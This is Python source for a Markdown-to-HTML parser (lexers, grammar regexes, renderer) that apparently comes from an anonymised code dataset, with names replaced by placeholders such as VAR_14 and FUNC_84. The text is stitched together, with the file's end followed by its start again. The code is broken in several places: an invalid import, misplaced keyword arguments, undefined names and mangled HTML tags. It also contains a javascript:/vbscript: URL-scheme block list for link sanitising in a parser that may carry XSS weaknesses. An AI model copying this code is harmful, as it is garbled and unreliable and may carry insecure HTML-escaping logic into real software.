self.tokens.append({
'type': 'footnote_start',
'key': VAR_13,
})
VAR_14 = VAR_44.group(2)
if '\n' in VAR_14:
VAR_97 = VAR_14.split('\n')
VAR_98 = None
for VAR_85 in VAR_97[1:]:
VAR_94 = len(VAR_85) - len(VAR_85.lstrip())
if VAR_94 and (not VAR_98 or VAR_94 < VAR_98):
VAR_98 = VAR_94
VAR_99 = [VAR_97[0]]
for VAR_85 in VAR_97[1:]:
VAR_99.append(VAR_85[VAR_98:])
VAR_14 = '\n'.join(VAR_99)
self.parse(VAR_14, self.footnote_rules)
self.tokens.append({
'type': 'footnote_end',
'key': VAR_13,
})
def FUNC_18(self, VAR_44):
VAR_79 = self._process_table(VAR_44)
VAR_80 = re.sub(r'(?: *\| *)?\n$', '', VAR_44.group(3))
VAR_80 = cells.split('\n')
for VAR_101, VAR_100 in enumerate(VAR_80):
VAR_100 = re.sub(r'^ *\| *| *\| *$', '', VAR_100)
VAR_80[VAR_101] = re.split(r' *\| *', VAR_100)
VAR_79['cells'] = VAR_80
self.tokens.append(VAR_79)
def FUNC_19(self, VAR_44):
VAR_79 = self._process_table(VAR_44)
VAR_80 = re.sub(r'\n$', '', VAR_44.group(3))
VAR_80 = cells.split('\n')
for VAR_101, VAR_100 in enumerate(VAR_80):
cells[VAR_101] = re.split(r' *\| *', VAR_100)
VAR_79['cells'] = VAR_80
self.tokens.append(VAR_79)
def FUNC_20(self, VAR_44):
VAR_69 = re.sub(r'^ *| *\| *$', '', VAR_44.group(1))
VAR_69 = re.split(r' *\| *', VAR_69)
VAR_81 = re.sub(r' *|\| *$', '', VAR_44.group(2))
VAR_81 = re.split(r' *\| *', VAR_81)
for VAR_101, VAR_100 in enumerate(VAR_81):
if re.search(r'^ *-+: *$', VAR_100):
VAR_81[VAR_101] = 'right'
elif re.search(r'^ *:-+: *$', VAR_100):
VAR_81[VAR_101] = 'center'
elif re.search(r'^ *:-+ *$', VAR_100):
VAR_81[VAR_101] = 'left'
else:
VAR_81[VAR_101] = None
VAR_79 = {
'type': 'table',
'header': VAR_69,
'align': VAR_81,
}
return VAR_79
def FUNC_21(self, VAR_44):
VAR_82 = VAR_44.group(1)
if not VAR_82:
VAR_14 = VAR_44.group(0)
self.tokens.append({
'type': 'close_html',
'text': VAR_14
})
else:
VAR_102 = VAR_44.group(2)
VAR_14 = VAR_44.group(3)
self.tokens.append({
'type': 'open_html',
'tag': VAR_82,
'extra': VAR_102,
'text': VAR_14
})
def FUNC_22(self, VAR_44):
VAR_14 = VAR_44.group(1).rstrip('\n')
self.tokens.append({'type': 'paragraph', 'text': VAR_14})
def FUNC_23(self, VAR_44):
VAR_14 = VAR_44.group(0)
self.tokens.append({'type': 'text', 'text': VAR_14})
class CLASS_2(object):
VAR_19 = re.compile(r'^\\([\\`*{}\[\]()#+\-.!_>~|])') # \* \+ \! ....
VAR_47 = re.compile(
r'^(?:%s|%s|%s)' % (
r'<!--[\s\S]*?-->',
r'<(\w+%s)((?:%s)*?)\s*>([\s\S]*?)<\/\1>' % (VAR_8, VAR_9),
r'<\w+%s(?:%s)*?\s*\/?>' % (VAR_8, VAR_9),
)
)
VAR_48 = re.compile(r'^<([^ >]+(@|:)[^ >]+)>')
VAR_49 = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\('
r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
r'\)'
)
VAR_50 = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\s*\[([^^\]]*)\]'
)
VAR_51 = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
VAR_17 = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
VAR_52 = re.compile(
r'^_{2}([\s\S]+?)_{2}(?!_)' # __word__
r'|'
r'^\*{2}([\s\S]+?)\*{2}(?!\*)' # **word**
)
VAR_53 = re.compile(
r'^\b_((?:__|[^_])+?)_\b' # _word_
r'|'
r'^\*((?:\*\*|[^\*])+?)\*(?!\*)' # *word*
)
VAR_54 = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)') # `VAR_54`
VAR_55 = re.compile(r'^ {2,}\n(?!\s*$)')
VAR_56 = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~') # ~~word~~
VAR_57 = re.compile(r'^\[\^([^\]]+)\]')
VAR_14 = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')
def FUNC_24(self):
self.linebreak = re.compile(r'^ *\n(?!\s*$)')
self.text = re.compile(
r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
)
class CLASS_3(object):
VAR_39 = CLASS_2
VAR_40 = [
'escape', 'inline_html', 'autolink', 'url',
'footnote', 'link', 'reflink', 'nolink',
'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
VAR_58 = [
'escape', 'autolink', 'url', 'link', 'reflink',
'nolink', 'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
def __init__(self, VAR_59, VAR_43=None, **VAR_20):
self.renderer = VAR_59
self.links = {}
self.footnotes = {}
self.footnote_index = 0
if not VAR_43:
rules = self.grammar_class()
VAR_20.update(self.renderer.options)
if VAR_20.get('hard_wrap'):
VAR_43.hard_wrap()
self.rules = VAR_43
self._in_link = False
self._in_footnote = False
self._parse_inline_html = VAR_20.get('parse_inline_html')
def __call__(self, VAR_14, VAR_43=None):
return self.output(VAR_14, VAR_43)
def FUNC_25(self, VAR_60, VAR_61):
self.footnote_index = 0
self.links = VAR_60 or {}
self.footnotes = VAR_61 or {}
def VAR_83(self, VAR_14, VAR_43=None):
VAR_14 = VAR_14.rstrip('\n')
if not VAR_43:
rules = FUNC_48(self.default_rules)
if self._in_footnote and 'footnote' in VAR_43:
rules.remove('footnote')
VAR_83 = self.renderer.placeholder()
def FUNC_84(VAR_14):
for VAR_13 in VAR_43:
VAR_21 = getattr(self.rules, VAR_13)
VAR_44 = VAR_21.match(VAR_14)
if not VAR_44:
continue
self.line_match = VAR_44
VAR_87 = getattr(self, 'output_%s' % VAR_13)(VAR_44)
if VAR_87 is not None:
return VAR_44, VAR_87
return False # pragma: no cover
while VAR_14:
VAR_84 = FUNC_84(VAR_14)
if VAR_84 is not False:
VAR_44, VAR_87 = VAR_84
VAR_83 += VAR_87
VAR_14 = FUNC_59[len(VAR_44.group(0)):]
continue
if VAR_14: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % VAR_14)
return VAR_83
def FUNC_27(self, VAR_44):
VAR_14 = VAR_44.group(1)
return self.renderer.escape(VAR_14)
def FUNC_28(self, VAR_44):
VAR_49 = VAR_44.group(1)
if VAR_44.group(2) == '@':
VAR_72 = True
else:
VAR_72 = False
return self.renderer.autolink(VAR_49, VAR_72)
def FUNC_29(self, VAR_44):
VAR_49 = VAR_44.group(1)
if self._in_link:
return self.renderer.text(VAR_49)
return self.renderer.autolink(VAR_49, False)
def FUNC_30(self, VAR_44):
VAR_82 = VAR_44.group(1)
if self._parse_inline_html and VAR_82 in VAR_6:
VAR_14 = VAR_44.group(3)
if VAR_82 == 'a':
self._in_link = True
VAR_14 = self.output(VAR_14, VAR_43=self.inline_html_rules)
self._in_link = False
else:
VAR_14 = self.output(VAR_14, VAR_43=self.inline_html_rules)
VAR_93 = VAR_44.group(2) or ''
VAR_64 = '<%s%s>%s</%s>' % (VAR_82, VAR_93, VAR_14, VAR_82)
else:
VAR_64 = VAR_44.group(0)
return self.renderer.inline_html(VAR_64)
def FUNC_31(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 not in self.footnotes:
return None
if self.footnotes[VAR_13]:
return None
self.footnote_index += 1
self.footnotes[VAR_13] = self.footnote_index
return self.renderer.footnote_ref(VAR_13, self.footnote_index)
def FUNC_32(self, VAR_44):
return self._process_link(VAR_44, VAR_44.group(3), VAR_44.group(4))
def FUNC_33(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(2) or VAR_44.group(1))
if VAR_13 not in self.links:
return None
VAR_84 = self.links[VAR_13]
return self._process_link(VAR_44, VAR_84['link'], VAR_84['title'])
def FUNC_34(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 not in self.links:
return None
VAR_84 = self.links[VAR_13]
return self._process_link(VAR_44, VAR_84['link'], VAR_84['title'])
def FUNC_35(self, VAR_44, VAR_49, VAR_62=None):
VAR_85 = VAR_44.group(0)
VAR_14 = VAR_44.group(1)
if VAR_85[0] == '!':
return self.renderer.image(VAR_49, VAR_62, VAR_14)
self._in_link = True
VAR_14 = self.output(VAR_14)
self._in_link = False
return self.renderer.link(VAR_49, VAR_62, VAR_14)
def FUNC_36(self, VAR_44):
VAR_14 = VAR_44.group(2) or VAR_44.group(1)
VAR_14 = self.output(VAR_14)
return self.renderer.double_emphasis(VAR_14)
def FUNC_37(self, VAR_44):
VAR_14 = VAR_44.group(2) or VAR_44.group(1)
VAR_14 = self.output(VAR_14)
return self.renderer.emphasis(VAR_14)
def FUNC_38(self, VAR_44):
VAR_14 = VAR_44.group(2)
return self.renderer.codespan(VAR_14)
def FUNC_39(self, VAR_44):
return self.renderer.linebreak()
def FUNC_40(self, VAR_44):
VAR_14 = self.output(VAR_44.group(1))
return self.renderer.strikethrough(VAR_14)
def FUNC_41(self, VAR_44):
VAR_14 = VAR_44.group(0)
return self.renderer.text(VAR_14)
class CLASS_4(object):
def __init__(self, **VAR_20):
self.options = VAR_20
def FUNC_42(self):
return ''
def VAR_26(self, VAR_54, VAR_63=None):
VAR_54 = code.rstrip('\n')
if not VAR_63:
VAR_54 = VAR_19(VAR_54, VAR_16=False)
return '<pre><VAR_54>%s\n</VAR_54></pre>\n' % VAR_54
VAR_54 = VAR_19(VAR_54, VAR_15=True, VAR_16=False)
return '<pre><VAR_54 class="lang-%s">%s\n</VAR_54></pre>\n' % (VAR_63, VAR_54)
def VAR_31(self, VAR_14):
return '<blockquote>%s\n</blockquote>\n' % VAR_14.rstrip('\n')
def VAR_36(self, VAR_64):
if self.options.get('skip_style') and \
VAR_64.lower().startswith('<style'):
return ''
if self.options.get('escape'):
return VAR_19(VAR_64)
return VAR_64
def VAR_69(self, VAR_14, VAR_65, VAR_66=None):
return '<h%d>%s</h%d>\n' % (VAR_65, VAR_14, VAR_65)
def VAR_28(self):
if self.options.get('use_xhtml'):
return '<hr />\n'
return '<hr>\n'
def FUNC_48(self, VAR_67, VAR_68=True):
VAR_82 = 'ul'
if VAR_68:
VAR_82 = 'ol'
return '<%s>\n%s</%s>\n' % (VAR_82, VAR_67, VAR_82)
def VAR_33(self, VAR_14):
return '<li>%s</li>\n' % VAR_14
def VAR_35(self, VAR_14):
return '<p>%s</p>\n' % VAR_14.strip(' ')
def VAR_37(self, VAR_69, VAR_67):
return (
'<VAR_37>\n<thead>%s</thead>\n'
'<tbody>\n%s</tbody>\n</VAR_37>\n'
) % (VAR_69, VAR_67)
def FUNC_52(self, VAR_70):
return '<tr>\n%s</tr>\n' % VAR_70
def FUNC_53(self, VAR_70, **VAR_71):
if VAR_71['header']:
VAR_82 = 'th'
else:
VAR_82 = 'td'
VAR_81 = VAR_71['align']
if not VAR_81:
return '<%s>%s</%s>\n' % (VAR_82, VAR_70, VAR_82)
return '<%s style="text-VAR_81:%s">%s</%s>\n' % (
VAR_82, VAR_81, VAR_70, VAR_82
)
def VAR_52(self, VAR_14):
return '<strong>%s</strong>' % VAR_14
def VAR_53(self, VAR_14):
return '<em>%s</em>' % VAR_14
def FUNC_56(self, VAR_14):
VAR_14 = VAR_19(VAR_14.rstrip(), VAR_16=False)
return '<VAR_54>%s</VAR_54>' % VAR_14
def VAR_55(self):
if self.options.get('use_xhtml'):
return '<br />\n'
return '<br>\n'
def VAR_56(self, VAR_14):
return '<del>%s</del>' % VAR_14
def VAR_14(self, VAR_14):
if self.options.get('parse_block_html'):
return VAR_14
return VAR_19(VAR_14)
def VAR_19(self, VAR_14):
return VAR_19(VAR_14)
def VAR_48(self, VAR_49, VAR_72=False):
VAR_14 = VAR_49 = FUNC_3(VAR_49)
if VAR_72:
VAR_49 = 'mailto:%s' % VAR_49
return '<a href="%s">%s</a>' % (VAR_49, VAR_14)
def VAR_49(self, VAR_49, VAR_62, VAR_14):
VAR_49 = FUNC_3(VAR_49)
if not VAR_62:
return '<a href="%s">%s</a>' % (VAR_49, VAR_14)
VAR_62 = VAR_19(VAR_62, VAR_15=True)
return '<a href="%s" VAR_62="%s">%s</a>' % (VAR_49, VAR_62, VAR_14)
def FUNC_62(self, VAR_73, VAR_62, VAR_14):
VAR_73 = FUNC_3(VAR_73)
VAR_14 = VAR_19(VAR_14, VAR_15=True)
if VAR_62:
VAR_62 = VAR_19(VAR_62, VAR_15=True)
VAR_64 = '<img VAR_73="%s" alt="%s" VAR_62="%s"' % (VAR_73, VAR_14, VAR_62)
else:
VAR_64 = '<img VAR_73="%s" alt="%s"' % (VAR_73, VAR_14)
if self.options.get('use_xhtml'):
return '%s />' % VAR_64
return '%s>' % VAR_64
def VAR_47(self, VAR_64):
if self.options.get('escape'):
return VAR_19(VAR_64)
return VAR_64
def VAR_25(self):
return ''
def FUNC_65(self, VAR_13, VAR_74):
VAR_64 = (
'<sup class="footnote-ref" id="fnref-%s">'
'<a href="#fn-%s">%d</a></sup>'
) % (VAR_19(VAR_13), VAR_19(VAR_13), VAR_74)
return VAR_64
def FUNC_66(self, VAR_13, VAR_14):
VAR_86 = (
'<a href="#fnref-%s" class="footnote">↩</a>'
) % VAR_19(VAR_13)
VAR_14 = VAR_14.rstrip()
if VAR_14.endswith('</p>'):
VAR_14 = re.sub(r'<\/p>$', r'%s</p>' % VAR_86, VAR_14)
else:
VAR_14 = '%s<p>%s</p>' % (VAR_14, VAR_86)
VAR_64 = '<li id="fn-%s">%s</li>\n' % (VAR_19(VAR_13), VAR_14)
return VAR_64
def VAR_61(self, VAR_14):
VAR_64 = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
return VAR_64 % (self.hrule(), VAR_14)
class CLASS_5(object):
def __init__(self, VAR_59=None, VAR_75=None, VAR_76=None, **VAR_20):
if not VAR_59:
VAR_59 = CLASS_4(**VAR_20)
else:
VAR_20.update(VAR_59.options)
self.renderer = VAR_59
if VAR_75 and inspect.isclass(VAR_75):
VAR_75 = VAR_75(VAR_59, **VAR_20)
if VAR_76 and inspect.isclass(VAR_76):
VAR_76 = VAR_76(**VAR_20)
if VAR_75:
self.inline = VAR_75
else:
self.inline = CLASS_3(VAR_59, **VAR_20)
self.block = VAR_76 or CLASS_1(CLASS_0())
self.footnotes = []
self.tokens = []
self._parse_block_html = VAR_20.get('parse_block_html')
def __call__(self, VAR_14):
return self.parse(VAR_14)
def FUNC_68(self, VAR_14):
return self.parse(VAR_14)
def FUNC_6(self, VAR_14):
VAR_87 = self.output(FUNC_4(VAR_14))
VAR_88 = self.block.def_footnotes
self.block.def_links = {}
self.block.def_footnotes = {}
self.inline.links = {}
self.inline.footnotes = {}
if not self.footnotes:
return VAR_87
VAR_61 = filter(lambda o: VAR_88.get(o['key']), self.footnotes)
self.footnotes = sorted(
VAR_61, VAR_13=lambda o: VAR_88.get(o['key']), reverse=True
)
VAR_67 = self.renderer.placeholder()
while self.footnotes:
VAR_103 = self.footnotes.pop()
VAR_67 += self.renderer.footnote_item(
VAR_103['key'], VAR_103['text']
)
VAR_87 += self.renderer.footnotes(VAR_67)
return VAR_87
def FUNC_69(self):
if not self.tokens:
return None
self.token = self.tokens.pop()
return self.token
def FUNC_70(self):
if self.tokens:
return self.tokens[-1]
return None # pragma: no cover
def VAR_83(self, VAR_14, VAR_43=None):
self.tokens = self.block(VAR_14, VAR_43)
self.tokens.reverse()
self.inline.setup(self.block.def_links, self.block.def_footnotes)
VAR_87 = self.renderer.placeholder()
while self.pop():
VAR_87 += self.tok()
return VAR_87
def FUNC_71(self):
VAR_89 = self.token['type']
if VAR_89.endswith('_start'):
VAR_89 = t[:-6]
return getattr(self, 'output_%s' % VAR_89)()
def FUNC_72(self):
VAR_14 = self.token['text']
while self.peek()['type'] == 'text':
VAR_14 += '\n' + self.pop()['text']
return self.inline(VAR_14)
def FUNC_73(self):
return self.renderer.newline()
def FUNC_74(self):
return self.renderer.hrule()
def FUNC_75(self):
return self.renderer.header(
self.inline(self.token['text']),
self.token['level'],
self.token['text'],
)
def FUNC_38(self):
return self.renderer.block_code(
self.token['text'], self.token['lang']
)
def FUNC_76(self):
VAR_90 = self.token['align']
VAR_91 = len(VAR_90)
VAR_92 = self.renderer.placeholder()
VAR_69 = self.renderer.placeholder()
for VAR_101, value in enumerate(self.token['header']):
VAR_81 = VAR_90[VAR_101] if VAR_101 < VAR_91 else None
VAR_71 = {'header': True, 'align': VAR_81}
VAR_92 += self.renderer.table_cell(self.inline(value), **VAR_71)
VAR_69 += self.renderer.table_row(VAR_92)
VAR_67 = self.renderer.placeholder()
for VAR_101, row in enumerate(self.token['cells']):
VAR_92 = self.renderer.placeholder()
for j, value in enumerate(row):
VAR_81 = VAR_90[j] if j < VAR_91 else None
VAR_71 = {'header': False, 'align': VAR_81}
VAR_92 += self.renderer.table_cell(self.inline(value), **VAR_71)
VAR_67 += self.renderer.table_row(VAR_92)
return self.renderer.table(VAR_69, VAR_67)
def FUNC_77(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'block_quote_end':
VAR_67 += self.tok()
return self.renderer.block_quote(VAR_67)
def FUNC_78(self):
VAR_68 = self.token['ordered']
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_end':
VAR_67 += self.tok()
return self.renderer.list(VAR_67, VAR_68)
def FUNC_79(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
if self.token['type'] == 'text':
VAR_67 += self.tok_text()
else:
VAR_67 += self.tok()
return self.renderer.list_item(VAR_67)
def FUNC_80(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
VAR_67 += self.tok()
return self.renderer.list_item(VAR_67)
def FUNC_31(self):
self.inline._in_footnote = True
VAR_67 = self.renderer.placeholder()
VAR_13 = self.token['key']
while self.pop()['type'] != 'footnote_end':
VAR_67 += self.tok()
self.footnotes.append({'key': VAR_13, 'text': VAR_67})
self.inline._in_footnote = False
return self.renderer.placeholder()
def FUNC_81(self):
VAR_14 = self.token['text']
return self.renderer.block_html(VAR_14)
def FUNC_82(self):
VAR_14 = self.token['text']
VAR_82 = self.token['tag']
if self._parse_block_html and VAR_82 not in VAR_7:
VAR_14 = self.inline(VAR_14, VAR_43=self.inline.inline_html_rules)
VAR_93 = self.token.get('extra') or ''
VAR_64 = '<%s%s>%s</%s>' % (VAR_82, VAR_93, VAR_14, VAR_82)
return self.renderer.block_html(VAR_64)
def FUNC_83(self):
return self.renderer.paragraph(self.inline(self.token['text']))
def FUNC_41(self):
return self.renderer.paragraph(self.tok_text())
def FUNC_5(VAR_14, VAR_19=True, **VAR_20):
return CLASS_5(VAR_19=FUNC_2, **VAR_20)(VAR_14)
|
import re
import .inspect
__version__ = '0.8.1'
__author__ = 'Hsiaoming Yang <me@lepture.com>'
__all__ = [
'BlockGrammar', 'BlockLexer',
'InlineGrammar', 'InlineLexer',
'Renderer', 'Markdown',
'markdown', 'escape',
]
VAR_0 = re.compile(r'\s+')
VAR_1 = re.compile(r'\W')
VAR_2 = re.compile(r'&(?!#?\w+;)')
VAR_3 = re.compile(r'\r\n|\r')
VAR_4 = re.compile(r'^ *> ?', VAR_71=re.M)
VAR_5 = re.compile(r'^ {4}', re.M)
VAR_6 = [
'a', 'em', 'strong', 'small', 's', 'cite', 'q', 'dfn', 'abbr', 'data',
'time', 'code', 'var', 'samp', 'kbd', 'sub', 'sup', 'i', 'b', 'u', 'mark',
'ruby', 'rt', 'rp', 'bdi', 'bdo', 'span', 'br', 'wbr', 'ins', 'del',
'img', 'font',
]
VAR_7 = ['pre', 'script', 'style']
VAR_8 = r'(?!:/|[^\w\s@]*@)\b'
VAR_9 = r'''\s*[a-zA-Z\-](?:\=(?:"[^"]*"|'[^']*'|[^\s'">]+))?'''
VAR_10 = r'(?!(?:%s)\b)\w+%s' % ('|'.join(VAR_6), VAR_8)
VAR_11 = ('javascript:', 'vbscript:')
def FUNC_0(VAR_12):
VAR_21 = VAR_12.pattern
if VAR_21.startswith('^'):
VAR_21 = pattern[1:]
return VAR_21
def FUNC_1(VAR_13):
VAR_13 = VAR_19(VAR_13.lower(), VAR_15=True)
return VAR_0.sub(' ', VAR_13)
def VAR_19(VAR_14, VAR_15=False, VAR_16=True):
if VAR_16:
VAR_14 = VAR_2.sub('&', VAR_14)
else:
VAR_14 = VAR_14.replace('&', '&')
VAR_14 = VAR_14.replace('<', '<')
VAR_14 = VAR_14.replace('>', '>')
if VAR_15:
VAR_14 = VAR_14.replace('"', '"')
VAR_14 = VAR_14.replace("'", ''')
return VAR_14
def FUNC_3(VAR_17):
VAR_22 = VAR_17.lower().strip('\x00\x1a \n\r\t')
for scheme in VAR_11:
if re.sub(r'[^A-Za-z0-9\/:]+', '', VAR_22).startswith(scheme):
return ''
return VAR_19(VAR_17, VAR_15=True, VAR_16=False)
def FUNC_4(VAR_14, VAR_18=4):
VAR_14 = VAR_3.sub('\n', VAR_14)
VAR_14 = VAR_14.expandtabs(VAR_18)
VAR_14 = VAR_14.replace('\u2424', '\n')
VAR_21 = re.compile(r'^ +$', re.M)
return VAR_21.sub('', VAR_14)
class CLASS_0(object):
VAR_23 = re.compile(
r'^ *\[([^^\]]+)\]: *' # [VAR_13]:
r'<?([^\s>]+)>?' # <VAR_49> or VAR_49
r'(?: +["(]([^\n]+)[")])? *(?:\n+|$)'
)
VAR_24 = re.compile(
r'^\[\^([^\]]+)\]: *('
r'[^\n]*(?:\n+|$)' # [^VAR_13]:
r'(?: {1,}[^\n]*(?:\n+|$))*'
r')'
)
VAR_25 = re.compile(r'^\n+')
VAR_26 = re.compile(r'^( {4}[^\n]+\n*)+')
VAR_27 = re.compile(
r'^ *(`{3,}|~{3,}) *(\S+)? *\n' # ```VAR_63
r'([\s\S]+?)\s*'
r'\1 *(?:\n+|$)' # ```
)
VAR_28 = re.compile(r'^ {0,3}[-*_](?: *[-*_]){2,} *(?:\n+|$)')
VAR_29 = re.compile(r'^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)')
VAR_30 = re.compile(r'^([^\n]+)\n *(=|-)+ *(?:\n+|$)')
VAR_31 = re.compile(r'^( *>[^\n]+(\n[^\n]+)*\n*)+')
VAR_32 = re.compile(
r'^( *)([*+-]|\d+\.) [\s\S]+?'
r'(?:'
r'\n+(?=\1?(?:[-*_] *){3,}(?:\n+|$))' # VAR_28
r'|\n+(?=%s)' # def VAR_60
r'|\n+(?=%s)' # def VAR_61
r'|\n{2,}'
r'(?! )'
r'(?!\1(?:[*+-]|\d+\.) )\n*'
r'|'
r'\s*$)' % (
FUNC_0(VAR_23),
FUNC_0(VAR_24),
)
)
VAR_33 = re.compile(
r'^(( *)(?:[*+-]|\d+\.) [^\n]*'
r'(?:\n(?!\2(?:[*+-]|\d+\.) )[^\n]*)*)',
VAR_71=re.M
)
VAR_34 = re.compile(r'^ *(?:[*+-]|\d+\.) +')
VAR_35 = re.compile(
r'^((?:[^\n]+\n?(?!'
r'%s|%s|%s|%s|%s|%s|%s|%s|%s'
r'))+)\n*' % (
FUNC_0(VAR_27).replace(r'\1', r'\2'),
FUNC_0(VAR_32).replace(r'\1', r'\3'),
FUNC_0(VAR_28),
FUNC_0(VAR_29),
FUNC_0(VAR_30),
FUNC_0(VAR_31),
FUNC_0(VAR_23),
FUNC_0(VAR_24),
'<' + VAR_10,
)
)
VAR_36 = re.compile(
r'^ *(?:%s|%s|%s) *(?:\n{2,}|\s*$)' % (
r'<!--[\s\S]*?-->',
r'<(%s)((?:%s)*?)>([\s\S]*?)<\/\1>' % (VAR_10, VAR_9),
r'<%s(?:%s)*?\s*\/?>' % (VAR_10, VAR_9),
)
)
VAR_37 = re.compile(
r'^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*'
)
VAR_38 = re.compile(
r'^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*'
)
VAR_14 = re.compile(r'^[^\n]+')
class CLASS_1(object):
VAR_39 = CLASS_0
VAR_40 = [
'newline', 'hrule', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'block_quote',
'list_block', 'block_html', 'def_links',
'def_footnotes', 'table', 'paragraph', 'text'
]
VAR_41 = (
'newline', 'block_code', 'fences', 'lheading', 'hrule',
'block_quote', 'list_block', 'block_html', 'text',
)
VAR_42 = (
'newline', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'hrule', 'block_quote',
'list_block', 'block_html', 'table', 'paragraph', 'text'
)
def __init__(self, VAR_43=None, **VAR_20):
self.tokens = []
self.def_links = {}
self.def_footnotes = {}
if not VAR_43:
rules = self.grammar_class()
self.rules = VAR_43
def __call__(self, VAR_14, VAR_43=None):
return self.parse(VAR_14, VAR_43)
def FUNC_6(self, VAR_14, VAR_43=None):
VAR_14 = VAR_14.rstrip('\n')
if not VAR_43:
rules = self.default_rules
def FUNC_84(VAR_14):
for VAR_13 in VAR_43:
VAR_104 = getattr(self.rules, VAR_13)
VAR_44 = VAR_104.match(VAR_14)
if not VAR_44:
continue
getattr(self, 'parse_%s' % VAR_13)(VAR_44)
return VAR_44
return False # pragma: no cover
while VAR_14:
VAR_44 = FUNC_84(VAR_14)
if VAR_44 is not False:
VAR_14 = FUNC_59[len(VAR_44.group(0)):]
continue
if VAR_14: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % VAR_14)
return self.tokens
def FUNC_7(self, VAR_44):
VAR_77 = len(VAR_44.group(0))
if VAR_77 > 1:
self.tokens.append({'type': 'newline'})
def FUNC_8(self, VAR_44):
VAR_54 = VAR_5.sub('', VAR_44.group(0))
self.tokens.append({
'type': 'code',
'lang': None,
'text': VAR_54,
})
def FUNC_9(self, VAR_44):
self.tokens.append({
'type': 'code',
'lang': VAR_44.group(2),
'text': VAR_44.group(3),
})
def FUNC_10(self, VAR_44):
self.tokens.append({
'type': 'heading',
'level': len(VAR_44.group(1)),
'text': VAR_44.group(2),
})
def FUNC_11(self, VAR_44):
self.tokens.append({
'type': 'heading',
'level': 1 if VAR_44.group(2) == '=' else 2,
'text': VAR_44.group(1),
})
def FUNC_12(self, VAR_44):
self.tokens.append({'type': 'hrule'})
def FUNC_13(self, VAR_44):
VAR_46 = VAR_44.group(2)
self.tokens.append({
'type': 'list_start',
'ordered': '.' in VAR_46,
})
VAR_45 = VAR_44.group(0)
self._process_list_item(VAR_45, VAR_46)
self.tokens.append({'type': 'list_end'})
def FUNC_14(self, VAR_45, VAR_46):
VAR_45 = self.rules.list_item.findall(VAR_45)
VAR_78 = False
VAR_77 = len(VAR_45)
for VAR_101 in range(VAR_77):
VAR_79 = VAR_45[VAR_101][0]
VAR_94 = len(VAR_79)
VAR_79 = self.rules.list_bullet.sub('', VAR_79)
if '\n ' in VAR_79:
VAR_94 = VAR_94 - len(VAR_79)
VAR_21 = re.compile(r'^ {1,%d}' % VAR_94, VAR_71=re.M)
VAR_79 = VAR_21.sub('', VAR_79)
VAR_95 = VAR_78
if not VAR_95 and re.search(r'\n\n(?!\s*$)', VAR_79):
VAR_95 = True
VAR_96 = len(VAR_79)
if VAR_101 != VAR_77 - 1 and VAR_96:
VAR_78 = VAR_79[VAR_96-1] == '\n'
if not VAR_95:
VAR_95 = VAR_78
if VAR_95:
VAR_89 = 'loose_item_start'
else:
VAR_89 = 'list_item_start'
self.tokens.append({'type': VAR_89})
self.parse(VAR_79, self.list_rules)
self.tokens.append({'type': 'list_item_end'})
def FUNC_15(self, VAR_44):
self.tokens.append({'type': 'block_quote_start'})
VAR_45 = VAR_4.sub('', VAR_44.group(0))
self.parse(VAR_45)
self.tokens.append({'type': 'block_quote_end'})
def FUNC_16(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
self.def_links[VAR_13] = {
'link': VAR_44.group(2),
'title': VAR_44.group(3),
}
def FUNC_17(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 in self.def_footnotes:
return
self.def_footnotes[VAR_13] = 0
self.tokens.append({
'type': 'footnote_start',
'key': VAR_13,
})
VAR_14 = VAR_44.group(2)
if '\n' in VAR_14:
VAR_97 = VAR_14.split('\n')
VAR_98 = None
for VAR_85 in VAR_97[1:]:
VAR_94 = len(VAR_85) - len(VAR_85.lstrip())
if VAR_94 and (not VAR_98 or VAR_94 < VAR_98):
VAR_98 = VAR_94
VAR_99 = [VAR_97[0]]
for VAR_85 in VAR_97[1:]:
VAR_99.append(VAR_85[VAR_98:])
VAR_14 = '\n'.join(VAR_99)
self.parse(VAR_14, self.footnote_rules)
self.tokens.append({
'type': 'footnote_end',
'key': VAR_13,
})
def FUNC_18(self, VAR_44):
VAR_79 = self._process_table(VAR_44)
VAR_80 = re.sub(r'(?: *\| *)?\n$', '', VAR_44.group(3))
VAR_80 = cells.split('\n')
for VAR_101, VAR_100 in enumerate(VAR_80):
VAR_100 = re.sub(r'^ *\| *| *\| *$', '', VAR_100)
VAR_80[VAR_101] = re.split(r' *\| *', VAR_100)
VAR_79['cells'] = VAR_80
self.tokens.append(VAR_79)
def FUNC_19(self, VAR_44):
VAR_79 = self._process_table(VAR_44)
VAR_80 = re.sub(r'\n$', '', VAR_44.group(3))
